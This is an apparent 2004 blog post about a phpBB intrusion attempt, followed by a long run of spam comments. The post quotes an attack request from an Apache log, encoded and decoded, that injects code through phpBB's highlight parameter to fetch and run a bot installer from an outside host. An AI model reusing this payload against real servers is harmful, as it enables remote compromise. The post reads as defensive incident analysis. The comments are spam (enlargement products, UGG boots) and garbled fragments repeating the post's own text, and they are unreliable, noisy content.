phpBB Security Holes
Didn't post about it until now, but I quite quickly found the hole I posted about. There were a few instances of phpBB running on the server, and on a hunch I did some googling which turned up a few recent vulnerabilities. Another clue, which I found later, was a bunch of entries in the apache log like this:
[30/Nov/2004:17:08:23 -0500] "GET /phpBB/viewtopic.php?t=%35&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%2F%20%3B%20%77%67%65%74%20%66%72%6F%67%67%79%2E%67%6F%2E%72%6F%2F%6D%2E%74%67%7A%3B%20%74%61%72%20%78%7A%76%66%20%6D%2E%74%67%7A%20%3B%20%63%64%20%2E%73%58%3B%20%2E%2F%69%6E%73%74%3B%20%72%6D%20%2D%72%66%20%6D%2E%74%67%7A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 29331
Which you can only really see the implications of when you decode them:
[30/Nov/2004:17:08:23 -500] "GET /phpBB/viewtopic.php?t=5&rush=echo _START_; cd /tmp/ ; wget froggy.go.ro/m.tgz; tar xzvf m.tgz ; cd .sX; ./inst; rm -rf m.tgz; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 29331
Also found the perl script they used to send
the request.
I downloaded a copy of m.tgz, and a quick look at it revealed that
our server would have become an irc-controlled bot, with a couple of daemons
disguised as 'httpd' and 'portsentry' executables (so as not to be too
obvious in the 'ps' output) -- except that on Debian, apache shows up as
'apache', so I think I'd have noticed them.
All in all, we were an easy target, but because 'wget' wasn't installed and the attack was automated (i.e. not smart enough to 'apt-get install wget'), we survived. *sigh-of-relief*
Posted by Jason Hildebrand <jason@opensky.ca>
Wednesday Dec 8,
2004 at
9:20 AM
15 penis enlargement devices, 10 penis enlargement patches.
15 penis enlargement devices, 10 penis enlargement patches.
Three phrases should be among the most common in our daily usage. They are: Thank you, I am grateful and I appreciate.
Three phrases should be among the most common in our daily usage. They are: Thank you, I am grateful and I appreciate.
Sudoku generator is ****** insane u are a dead set legend, good luck in life mate wish u the best! im 15 and my grandparents love u to.
Hello people!!! I like this site!!! Be Happy!!!!
Very intresting information!!! Cool site!!! Thanks!!!
Very intresting information!!!
write more!!!come to my site
Very intresting information!!!
great content with a nice layout.
great content with a nice layout.
great content with a nice layout.
great content with a nice layout.
Great sitea with great resources.
Great sitea with great resources.
ee phrases should be among the most common in our daily usage. They are: Thank you, I am grateful and I
w, but I quite quickly found the hole I posted about. There were a few instances of phpBB running on the server, and on a hunch I did some googli
t I quite quickly found the hole I posted about. There were a few instances of phpBB running on the server, and on a hunch I did some googling which turned up a few recent vulnerabilities. Another clue, which I found l
rver, and on a hunch I did some googling which turned up a few recent vulnerabilities. Another clue, which I found l
Great site and resources!
Great site and resources!
unch I did some googling which turned up a few recent vulnerabilities. Another clue, which I found
h turned up a few recent vulnerabilities. Another clue, which I found
ch turned up a few recent vulnerabilities. Another clue,
recent vulnerabilities. Another
ecent vulnerabilities. Another
t I quite quickly found the hole I posted about. There were a few insta
Great resources on female libido products
Great resources on semen enhancers
Great resources great site
Great resources great site
ee phrases should be among the most common in our daily usage. They are: Thank you, I am grateful and I
ee phrases should be among the most common in our daily usage. They are: Thank you, I am grateful and I
downloaded a copy of m.tgz, and a quick look at it revealed that our server would have become an irc-controlled bot, with a couple of daemons disguised as 'httpd' and 'portsentry' executables (so as not to be too obvious in the 'ps' output) -- except that on Debian, apache shows
the great work done by the web master and would like to tell everyone that they should post the great work done by the web master and would like to tell everyone that they should post their interesting comments and should make this blog interesting. Oncetheirthe great work done by the web master and would like to tell everyone that they should post their interesting comments and should make this blog interesting. Once interesting comments and should make this blog interesting. Once
that they should post their interesting comments and should make this blog in that they should post their interesting comments and should make this blog interesting. Oncetheirthe great work done by the web master and would like to tell everyone that they should post their interesting comments and should make this blog teresting. Oncetheirthe great work done by the web master and would like to tell everyone that they should post their interesting comments and should make this blog
they should post their interesting comments and should make this blog teresting. Oncetheirthe great they should post their interesting comments and should make this blog teresting. Oncetheirthe great work done by the web master and would like to tell everyone that they should work done by the web master and would like to tell everyone that they should
View Client and RGS. However there is no multi-monitor suconnected VMwaer View Client and RGS. However there is no multi-monitor suconnected to a VM using VMwaer View Client and RGS. However there is no multi-port which is a big
Client and RGS. However there is no multi-monitor suconnected VMwaer View Client and RGS. However there is no multi-monitor suconnected to a VM using
. However there i. However there is no multi-monitor suconnected VMwaer View Client and RGS. However s no multi-monitor suconnected VMwaer View Client and RGS. However
RGS. However there is no multi-monitor suconnected VMwaer View Client and RGS. However there is no multi-monitor suconnected to a VM using
However there is no multi-monitor suconnected VMwaer View Client and RGS. However there is no multi-monitor suconnected to a VM using VMwaer View Client and RGS. However
ThinkPad T40 has been awesome. Had for a decent price. There was a problem with the main board about 4 months down the road and customer service couldn't have been better. I spoke with someone in America, and they overnighted everything. The entire process only took 3 days from placing the service call to getting back and running.
main board about 4 months down the road and customer service couldn't have been better. I spoke with someone in America, and they overnighted everything. The entire
about 4 months down the road and customer service couldn't have been better. I spoke with someone in America, and they overnighted everything. The entire
that’s the first time i see this pictures, and they look pretty interesting I would say. I don’t know which generation is today’s iPod, but this looks new to me.
Hi, I just found your blog - thanks for the good work. Just wanted to let you know that it's not displaying correctly on the BlackBerry Browser (I have a Bold). Either way, I am now on the RSS feed on my home PC, so thanks again!
Very intresting information!!!
Some days ago I discussed that topic with another guy just with a different result. It s a topic challenging for discussions over and over again. Interesting elements you used for argumentation
great to post my comments on such a blog. I would great to post my comments on such a blog. I would like to appreciate the great work done by the web master and like to appreciate the great work done by the web master and
You do a greait professionwith this post! I love all of them!|A kind of usefultopic.
Hi, I just found your blog - thanks for the good work. Just
You do a greait professionwith this post! Thanks.
Sorry for the huge review, but I'm really loving the new toys, and hope this, as well as the excellent reviews some other people have written
its a great post!thanks for sharing!
I very much impressive to read this post. Great informative, I will go to bookmarking this.
log sites and content centric sites like Digg. Considered a better alternative to submitting a website on blogs, manual social bookmarking is a simple, convenient and hassle-free way of making sure that your site is noticed and marketed in the right circle.
This is very interesting especially because its about winter wheat. Mosty other blogs tend to be boring. Not at all ordinary, this is actually very interesting probably because its about winter wheat.
thank you site…
more detailed information on the following sites that I’ve read
UGG Boots is one snowy boot brand which is made of Australian pure wool. It has had over thirty's history. UGG includes except male and female
Ugg Bailey Button, sandals, but also the baby shoe. At the first sight of
UGG Classic Cardy Boots, people could not fall in love in its stupid cartoon shape at once, but Its thickness, suppleness and leisure win much favor from European and American Stars.
UGG Classic Short Boots may let you enjoy the super comfortable warmth in the winter.
UGG Sandals blew the prevailing wind continued explosive. Its product line also starts not only to be restricted in the sheep leather boots, gradually increases
UGG Classic Tall Boots which is made of the high-quality sheepskin.